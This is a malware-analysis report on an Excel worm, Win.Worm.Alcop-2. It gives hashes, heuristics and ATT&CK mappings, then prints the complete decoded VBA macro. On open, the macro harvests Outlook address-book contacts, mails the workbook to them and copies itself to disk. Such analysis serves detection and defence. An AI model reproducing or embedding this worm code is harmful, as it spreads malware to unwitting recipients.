Win.Worm.Alcop-2 — Office (OLE) / .XLS malware analysis

Static analysis result for SHA-256 9b99ba8275e2ce62…

MALICIOUS

Office (OLE) / .XLS

Size: 22.0 KB
Created: 2002-11-21 02:10:05
Authoring application: Microsoft Excel
First seen: 2026-06-24
MD5: 0fd6e2cc3c1a247a1db959644851fe3d
SHA-1: a30948e9f235879515797274d19e3044d2ff5001
SHA-256: 9b99ba8275e2ce6201679d08359ba69171a371156d31a963a375cfb4b7c4b60a
Risk Score: 248

Malware Insights

Win.Worm.Alcop-2 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1041 Exfiltration Over C2 Link

The VBA macro contains a Workbook_Open subroutine that uses CreateObject to interact with Outlook. It harvests recipients from the MAPI address book, composes an email with the subject 'Nice Embedded Object' and body 'Check out the embedded object in the excel sheet...', attaches the current workbook, and sends it. It also copies itself to 'c:\topsecret.xls'. This behavior is consistent with a self-replicating email worm.

Heuristics (5)

  • ClamAV: Win.Worm.Alcop-2 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Win.Worm.Alcop-2
  • VBA macros detected [medium, OLE_VBA_MACROS] (3 related findings)
    Document contains VBA macro code
  • VBA email-worm self-replication (Outlook mass-mailer) [critical, OLE_VBA_EMAIL_WORM_SELF_REPLICATION]
    VBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvesting recipients from the MAPI address book / inbox, attaching a file to the outgoing message, and sending the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage; there is no benign document use, independent of any AV signature.
    Matched line in script:
    Set c = a.CreateItem(0)
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    CreateObject call
    Matched line in script:
    Set a = CreateObject("Outlook.Application")
  • Workbook_Open macro [low, OLE_VBA_WBOPEN]
    Workbook_Open macro
    Matched line in script:
    Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2150 bytes
SHA-256: e171ced100fe4d6cab1768ea1eec70ec304cc09b6eb0eb93d54411cdea433a8f

Detection
ClamAV: Win.Worm.Alcop-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
On Error Resume Next
Dim a, b, y, d, x, c, e, oo, fso, f, j
Set a = CreateObject("Outlook.Application")
Set b = a.GetNameSpace("MAPI")
If a = "Outlook" Then
b.Logon "profile", "password"
For y = 1 To b.AddressLists.Count
Set d = b.AddressLists(y)
x = 1
Set c = a.CreateItem(0)
For oo = 1 To d.AddressEntries.Count
e = d.AddressEntries(x)
c.Recipients.Add e
x = x + 1
If x > 101 Then oo = d.AddressEntries.Count
Next oo
c.Subject = "Nice Embedded Object"
c.Body = "Check out the embedded object in the excel sheet..."
c.attachments.Add ActiveWorkbook.FullName
c.Send
e = ""
Next y
b.Logoff
End If
Worksheets(1).Shapes(1).OLEFormat.Activate
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(ActiveWorkbook.FullName)
f.Copy ("c:\topsecret.xls")
Set j = Assistant.NewBalloon
With j
.Heading = "alcopaul says"
.Text = "E-mail me..."
returnValue = .Show
End With
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True